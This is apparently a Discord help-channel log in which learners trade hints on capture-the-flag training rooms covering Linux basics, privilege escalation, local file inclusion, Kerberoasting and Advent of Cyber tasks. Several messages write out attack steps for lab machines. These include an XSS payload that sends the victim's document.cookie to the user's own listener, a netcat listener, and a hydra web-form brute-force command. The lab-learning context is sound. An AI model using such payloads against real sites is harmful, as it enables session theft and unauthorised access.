Has anybody completed the Learn Linux room, I'm stumped on Task 21

patent jacinth
#

Has anybody completed the Learn Linux room, I'm stumped on Task 21
@mental lichen I have πŸ™‚

#

let me have a look

mental lichen
#

thanks, it's to do with environment variables

patent jacinth
#

here's a write up on it

#

you have to use export to change the user to test1234

mental lichen
#

I really don't want to look at a write up yet, surely it should be simple. I just want to check with someone if my theory was correct

patent jacinth
#

ok, you have the right idea then for sure

mental lichen
#

I tried to set the variable rather than using export

#

But I get a segmentation fault when I run the binary

patent jacinth
#

yeh, I got the same

echo thunder
#

I am trying to do the challange of jack of all trades but firefox is telling me that the page is restricted. I tried to go on about:config and add the network.security.ports.banned.override
but is not working even after that
any ideea on how I should resolve this?

patent jacinth
#

not sure, bud @echo thunder

#

@mental lichen

mental lichen
#

I am an absolute chump, lol

patent jacinth
#

lol I got stuck on it for ages too man

mental lichen
#

thank you so much

topaz forum
#

good!

#

hhh

#

πŸ‰

#

jj

#

j

#

j

white salmon
#

i cant seem to find the ssh password in the room thecodcaper

#

i have the reverse shell and im on the www-data user

#

i used find / -user pingu to find all files owned by pingu, but i cant find where the ssh password is

#

i saw an id_rsa and id_rsa.pub in /home/pingu/.ssh and tried to use that but it refused the id_rsa private key i got from the server and tried to use

#

am i doing something wrong?

stuck fractal
#

Who says it's owned by pingu? @white salmon

white salmon
#

oh

#

what should i be doing then?

#

and i tried to put the id_rsa.pub in /home/pingu/.ssh/authorized_keys too

violet fog
#

You have it

white salmon
#

hm?

solid patrol
#

u need to change premison of that key to be able to login without password

white salmon
#

oh

#

hm ok

#

but now how do i make pingu the owner of authorised_keys, chown says the operation isn't permitted

vestal igloo
#

can I get any hints for blueprint?

#

cant use any of the links cause url changes to localhost

solid patrol
#

@white salmon u need to change premison of id_rsa to work with ssh command

stuck fractal
#

I might be wrong, but I think the id_rsa is a rabbit hole here

violet fog
#

@stuck fractal not really sometime you need John to help

stuck fractal
#

No, here.

violet fog
#

@stuck fractal yes, if it codCoper

#

or that the way i did it

stuck fractal
#

I remember pars saying that whole thing was a rabbit hole but OK

vestal igloo
#

yeah id_rsa doesnt work

#

on cod

violet fog
#

@stuck fractal let me re-check

stuck fractal
#

There are two people telling you the opposite

#

@vestal igloo Maybe you can change where localhost points

vestal igloo
#

i was worried i could ruin something or i was digging my own rabbit hole somehow thanks for affirmation

stuck fractal
#

@vestal igloo I might be wrong

vestal igloo
#

i guess i will have to find out plus its something good to learn so no harm

#

bless your soul

echo thunder
#

Hello all

#

did anyone complete strings challange

#

?

stuck fractal
#

Dark was having trouble with the bitcoin address on stream yesterday

echo thunder
#

yes

#

I cannot find the bitcoin address

stuck fractal
#

@steady stratus Investigate

#

Dark couldn't find it either

steady stratus
#

Are you using the suggested windows VM? @echo thunder

stuck fractal
#

Dark was

echo thunder
#

yues

#

yes

#

I've tried also on kali

steady stratus
#

Dark couldn't find it either you say? @stuck fractal

stuck fractal
#

Yep

#

I think it broke

steady stratus
#

I'll have to look at his vod when I finish my shift in a couple of hours

#

yikes okay uhh

echo thunder
#

ok

#

no proble,

#

problem

#

until than I will search again every line

steady stratus
#

sorry pal - I'll have to investigate when I can tonight

echo thunder
#

@steady stratus found the wallet

#

needed to restart

#

the windows vm

#

did anyone complete the symfonos6 challenge?

hasty gust
#

hey all - on the CTF-ToolsRus box, it says to use a Nikto / Nmap scan and give the name and version of the software for task #6. I did this but it didn't give me the correct answer. Is there a blooper or something i'm doing wrong?

stuck fractal
#

@hasty gust Make sure you go for the right port

#

I can't say which as it's an answer

hasty gust
#

@stuck fractal i'm pretty sure I did , but i'll re-try. I went for a port with increasing numbers (without giving it away hopefully)

stuck fractal
#

DM me your answer then @hasty gust

white salmon
#

In steelmountain how do I replace the legitimate binary?

shrewd skiff
#

What did you try?

#

@white salmon ||I hear powershell is a good tool.|| But of course there might be other good tools. I guess thats my hint. Sleep well πŸ™‚

stuck fractal
#

@white salmon Metasploit has an upload feature if you have a meterpreter. Otherwise, you can host it on a webeserver and grab it

white salmon
#

yeah have done both of it, also have an idea :)

#

ty for answering btw

steep tiger
#

So I am doing the volatility room right now and did all the volatility parts but I can't upload the file to hybrid analysis because its too big

#

and the other one doesn't give anything

#

so uhm what could I do?

#

there are no writeups so Ican't get the answer anywhere

stuck fractal
#

@steep tiger Read the question carefully

#

What are you uploading?

steep tiger
#

mmm

#

might have to be the dlls instead

#

but one problem then still

#

--pid is not an option

#

it doesnt exist

#

so I just guessed 12 because it was that before

stuck fractal
#

It probably does, but only in conjunction with a different option

steep tiger
#

-_-

#

I am a dumbie

#

I forgot the dlldump part

rapid hamlet
#

yo guys

#

I need some help

#

with the room "thefindcommand"

#

in task #3 the 7th question

#

"Find all files in the /usr/bin directory (recursive) that are owned by root and have at least the SUID permission (use symbolic format)"

#

So it would be: find /usr/bin -type f -user root -perm ??

#

it doesn't specify whose perms it is for

stuck fractal
#

SUID isn't a perm for a user @rapid hamlet

#

SUID is a special perm that applies to everyone

rapid hamlet
#

I know

#

but it doesn't specify who should "at least have the SUID permission"

#

/u=s?

#

/g=s?

#

I've tried those, it returns incorrect answer

stuck fractal
#

That's not how SUID works

#

SUID doesn't belong to a user

#

SUID allows the person (anyone) running the binary to run it as the owner

rapid hamlet
#

It's a permission

stuck fractal
#

Yes. But not the same as g=r

#

It's not split into UGO

#

It's a yes or no

rapid hamlet
#

so how should it be represented in symbolic?

stuck fractal
#

Google it

rapid hamlet
#

I need help

#

I can't seem to find it

#

oh shit nvm, i did it

#

@stuck fractal ty

white salmon
#

In steel mountain, after restaring the program, ||I need to migrate the process don't I? ||

stuck fractal
#

@white salmon You need to listen for a shell

#

You need to get the new, more privileged shell

white salmon
#

I mean, I did all of that but still doest work

#

I must be doing something wrong but huh

shell sun
#

MJQXGZJTGIQGS4ZAON2XAZLSEBRW63LNN5XCA2LOEBBVIRRHOM====== Can somebody say me, how I can decode this? I'm stuck with this string blobhuh

still elm
#

Which encode ends with =? @shell sun

stuck fractal
#

there's a few

shell sun
#

I don't know but it looks familiar

stuck fractal
#

Well, investigate then @shell sun

shell sun
#

I've been working on this code for about an hour

stuck fractal
#

Then you haven't been researching the right things

#

Look at encodings

still elm
#

there's a few
@stuck fractal I can recall only 3, and I'm not sure with the least

stuck fractal
#

few can mean 2

#

But I know at least 2

#

And I can tell you which one it is, but that's more than a hint

shell sun
#

Do you know a good website, where all the encodings are listed?

still elm
#

There is a tool inside kali that could help you identify the encoding

stuck fractal
#

@shell sun google "encodings"

#

More specifically, data encodings

white salmon
#

Hi,anyone can give me a hint for flag value cc pentesting room (sqlmap β€” ?)

stuck fractal
#

@white salmon Yes, use sqlmap

white salmon
#

Thx

ornate narwhal
white salmon
#

Oaw great man,cheers for this

patent token
#

Anyone able to help with App Locker?

#

I have run invoke kerberoast, but I'm getting token length and separator unmatched errors with the ticket.

stuck fractal
#

@patent token I had that, with some really weird line break issues

patent token
#

Right. They pull far right.

stuck fractal
#

If you remove linebreaks, it might work

patent token
#

But when trying to modify them I'm really not having any luck

#

So try going in just one really long line?

stuck fractal
#

yep

#

On the ticket, for hashcat

#

krb5tgs?

patent token
#

yep

stuck fractal
#

Attacktive?

#

Wait, Corp?

patent token
#

Yea

#

Corp

stuck fractal
#

Yeah I had the same issue

patent token
#

I'll give it a whirl. Thank you.

#

That did the trick. Thank you again. I really appreciate it.

stuck fractal
#

@patent token Glad it worked

patent token
#

Wouldn't have a hint on the encrypted password by chance? I've checked base64, base32, hash-identifier, etc.

stuck fractal
#

@patent token Yeah read carefully

#

It's MS stuff

patent token
#

||I see the enabled true and plaintext false.||

stuck fractal
#

@patent token I have a hint but it's more of a help

patent token
#

Help == hint for me. πŸ˜›

white salmon
#

After 7 hours still not getting the value of the flag, cc pentesting room /sqlmap challeng,any hints pls?

tidal sedge
verbal raven
#

can anyone help me?

odd void
#

Right, can you list the files in that directory and send the output here?

verbal raven
#

that last one is shiba1 btw

#

1 was cut out

odd void
#

So you've made the noot.txt file, now you need to run the shiba1 binary to get the flag.

verbal raven
#

ah ok

#

got it now thank you πŸ™‚

odd void
#

For all the binary tasks, the name of the binary is in the task title

verbal raven
#

okay πŸ™‚

naive geyser
#

Anyone know how to replace the process (with metasploit) in steel mountain

#

I tried a lot of things and it still didn't work

#

Any hints would be nice

digital plover
#

anyone active

glossy basin
#

yup

#

what's up

unkempt belfry
#

What's up yo

white salmon
#

@naive geyser how would you replace an archive in windows?

naive geyser
#

I'm trying it out now thx

white salmon
#

I mean, dont know if you understand what I said

white salmon
#

Sqlmap is broken ;

#

huh?

naive geyser
#

?

white salmon
#

so @naive geyser did you figure it out? :)

naive geyser
#

not yet @white salmon

#

i had some problems with metasploit but i fixed them now

odd belfry
#

Hello everyone, I'm doing the learn Linux room and I am on the last task where you have to find a key. it says it is in root/root.txt, but if i try to go there it says permission denied :( Can anyone help?

glossy basin
#

@odd belfry yes, you need to gain root privileges

#

by privilege escalation

#

(check the write up if you are not sure)

odd belfry
#

Okay I will look. Thank you very much.

odd belfry
#

what is a write up?

glossy basin
#

!writeup zthlinux

proud scarabBOT
glossy basin
#

@odd belfry ^

odd belfry
#

woow thank you man

glossy basin
#

anytime

white salmon
#

Is there any known problem with deployed machines?

#

???

proven bridge
#

@white salmon No

grand pivot
#

Hi everyone! i guess this is the room i need

#

In the challenge says you can read the file, so im lost i guess

shrewd skiff
#

I did not do the challenge but some times you can right-click to view the source of the page. If its a .log file it should be just text so no reason a browser should not show its content.

#

usually when having an e.g. include($_GET["page"]) for the url you posted.

#

@grand pivot so i assume it would normally be like ?page=home or even ?page=about.php or w/e extension πŸ™‚

grand pivot
#

lets try again so

shrewd skiff
#

@grand pivot yea πŸ™‚

echo thunder
#

Hello everyone

grand pivot
#

i get it! Thank you! πŸ™‚

echo thunder
#

can I have a hint on how to find the answer to task 12 question 9?

dire karma
#

pee pee poo poo

stuck fractal
#

@dire karma Official warning. One more, you're banned.

grand pivot
#

@echo thunder i think you need to specify the room

echo thunder
#

@grand pivot hackback2019

#

forgot to mention it

#

sorry

#

did you complete the room?

#

can I have a hint on how to find the answer to task 12 question 9 for HackBack 2019 challange?

grand pivot
#

hi, im here again xD

#

i need to do uname -r on the lfi basics room

#

but the blankspace is not a good friend (actually just uname doesnt in either), so i tried with ls and everything is ok. So i guess the structure of the request is fine

#

and tried with url encode but nothing

#

and with "+"

wraith fulcrum
#

could anyone give me a push on inoculation?

stuck fractal
#

@white salmon Osint

#

OSINT

still elm
#

@grand pivot how to write spaces in urls?

grand pivot
#

im trying w/o spaces right now

#

and same problem, so first i have to fix that

stuck fractal
#

@grand pivot uname-r isn't a valid command

grand pivot
#

im trying now just with "uname" without arguments

#

anyway, i tried with encoding the url but doesnt work, that's why i give a spet backwards

#

step*

grand pivot
#

well, i reboot the mv and clean everything, and use encoding and it works

#

i get it! Thanks for everyone!

white salmon
#

in hackpark, where can I see the theme I uploaded? it's task 2

frank ether
#

Can someone help me with day 18 of advent of cyber. I'm trying to get the admin cookie but it just keeps giving me my own session cookie instead

#

I'm doing this: </p><script>console.log(document.cookie)</script><p>test

still elm
#

@frank ether try to make a persistent xss that sends the cookie to a listening server

signal oak
#

https://tryhackme.com/room/hydra Can someone help me with the syntax for the webform? I had the SSH one in a minute and can't get the webform one right whatever I try.

#

This is what I've tried: ||hydra -l molly -P 10.10.72.240 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V||

#

Error message: ||[ERROR] Unknown service: /:username=^USER^&password=^PASS^:F=incorrect||

stuck fractal
#

Look at the syntax for hydra http

frank ether
#

@still elm I tried using window.location<my ip> + document.cookie but that didn't work either

#

it messed up the whole web page and it started sending the cookie from my ip for some reason

still elm
#

did you set up a listening service?

#

it messed up the whole web page and it started sending the cookie from my ip for some reason
@frank ether i know what do you mean. first time i did that i had to redeply the machine 2 times

frank ether
#

ya I set it up on port 80

#

and I waited like 10 minutes

#

nothing

#

but it sent my cookie right away

still elm
#

try to stop and restart the service

frank ether
#

the weird thing is that it sent it from my ip to my ip

#

I tried like 6 times

still elm
#

i can't try atm, but i'll check later how i solved that... i need to refresh my memory

frank ether
#

sweet thank you

signal oak
#

Hi @stuck fractal , thanks for the link! I found that site earlier and tried some stuff but I just don't see it. I think I'm doing something wrong in the first bit after http-post-form.

stuck fractal
#

/ isn't the login page

#

for a start

signal oak
#

Hmmm. Ok. I have the some result with "/login"

stuck fractal
#

Also, you're using the IP address as your password list

signal oak
#

Oh haha that would not work.

#

Running now. Thanks @stuck fractal !

#

Can't believe I missed that.

still elm
#

@frank ether did you put onload on the script when you send it back to your listener?

frank ether
#

i'm not sure what that means

#

payload or onload?

still elm
#

onload

frank ether
#

how would I do that

still elm
#

Dm me

frank ether
#

I'm really new to XSS stuff

stuck fractal
#

@still elm You don't need to onload if you have it inline

#

The code was running

still elm
#

i've tryed without and it didn't work, but maybe i've mispelled something the first time

frank ether
#

@stuck fractal do you know if there's something wrong with this:</p><script> window.location = 'http://<local-machine-ip>/page?param=' + document.cookie </script><p>

#

because that's what @inland onyx did and it worked for him

#

but ya it's just not working for me

stuck fractal
#

What type of server are you running to listen?

frank ether
#

i'm using netcat

#

on port 80

#

nc -lvnp 80

stuck fractal
#

Reset it every time you get a cookie, don't touch the webpage after you set the payload

#

And by local machine IP, what IP are you using?

frank ether
#

my vpn ip

stuck fractal
#

Ok

frank ether
#

10...

stuck fractal
#

if you want discord not to format stuff, use `around it` and it'll put it in an inline code block

frank ether
#

ya i just realized

#

10.*.**.***

#

ok i did killall nc and then restarted

#

so now i'll just wait for the admin to log on hopefully

#

yea it's been 7 minutes and I haven't gotten any cookie yet

#

i'll keep waiting but idk if it's working

#

the web page is just perpetually loading

#

and it says Waiting for <my ip>

stuck fractal
#

I said don't touch the page

frank ether
#

i didn't

#

i'm gonna retry

#

I think I may know why it didn't work

#

I might have to open the port after I inject

stuck fractal
#

...you need a listener running yes

frank ether
#

no but I was opening the port before

stuck fractal
#

Doesn't matter

frank ether
#

i'm thinking that if i open it right after then it might work

stuck fractal
#

But if you get your own cookie, you need to restart

frank ether
#

I feel like i'm the only one who has any problem with these advent of cyber challenges

stuck fractal
#

That's mostly because everyone had the problems back in december

frank ether
#

oh true

still elm
#

i got the same exact problem @frank ether and i solved in the way that i've explained. i've tryed and it worked again. i tryed a third time, and now, i get no response (neither my own cookie πŸ˜… )

frank ether
#

i just got it actually

#

I think the trick was to open the port after injecting

#

thanks for the help

sand glen
#

anyone here for a nudge about this challenge

#

Advent of cyber room

stuck fractal
#

@sand glen Log in as that user

sand glen
#

but I don't have the email

stuck fractal
#

The point of the challenge is to break the authentication @sand glen

#

You know how the server tracks sessions, try becoming that user

sand glen
#

I tried editing the cookie but it didn't work xD

stuck fractal
#

Then you didn't quite do it right

#

Make sure there isn't a 7 in your fixed part

#

If there's a 7, it's wrong

#

Use CyberChef to encode and decode

sand glen
#

so it's not base64 ?

stuck fractal
#

No, it is.

#

But if there's a 7 in the fixed part, your decoder is bad

#

Wait, it might not be a 7

#

lemme check

#

Yeah, if there's a 7 then it's a bad decoder

inland onyx
#

Tends to be if you're using echo "<cookie>" | base64 -d in the terminal

#

That throws in an extra newline

#

Same when re-encoding afterwards

stuck fractal
#

CyberChef > all

sand glen
#

so I need to use -n flag

inland onyx
#

You do, @sand glen

sand glen
#

@inland onyx can I dm pls?

inland onyx
#

You may. Thank you for asking

quaint radish
#

Hi, need help with linux challenges, task4
#7 Locate and retrieve flag 26. I can't find file name flag26, and have to use this : grep -Ril "flag26" / 2>/dev/null , take too long and I don't think it will find the file in short period of time.. any hint?

frank ether
#

try using the find command instead

#

you can do find -name <exact name of file>

stuck fractal
#

That challenge wasn't well thought out, btw. The way the writeup does it is basically bruteforcing for any flags @quaint radish

frank ether
#

so find / -name "flag26.txt" 2>/dev/null

stuck fractal
#

That assumes 2 things about the flag

#
  1. That it's a .txt
#
  1. That it's even called flag26
frank ether
#

well usually it will tell you though

#

at least it did for the challenge I just did

#

ya if it doesn't tell you the exact name of the file then just use grep

#

so I would do find / 2>/dev/null | grep "flag26"

quaint radish
#

so basically I have to wait until it find flag26 in a particular file?

frank ether
#

ya it searches directories to find the file

#

how long have you been waiting

quaint radish
#

hi RimRam.. I did use that, but no file show up

#

I combined find and grep

frank ether
#

one second

stuck fractal
#

Who says "flag26" is in the file?

quaint radish
#

.huh let me think

frank ether
#

ya i'm not a subscriber yet so I can't see the problem

#

but ya just listen to ninja

#

he knows a lot more than me anyway

stuck fractal
#

Having seen the solution in the writeup, I disagree with the challenge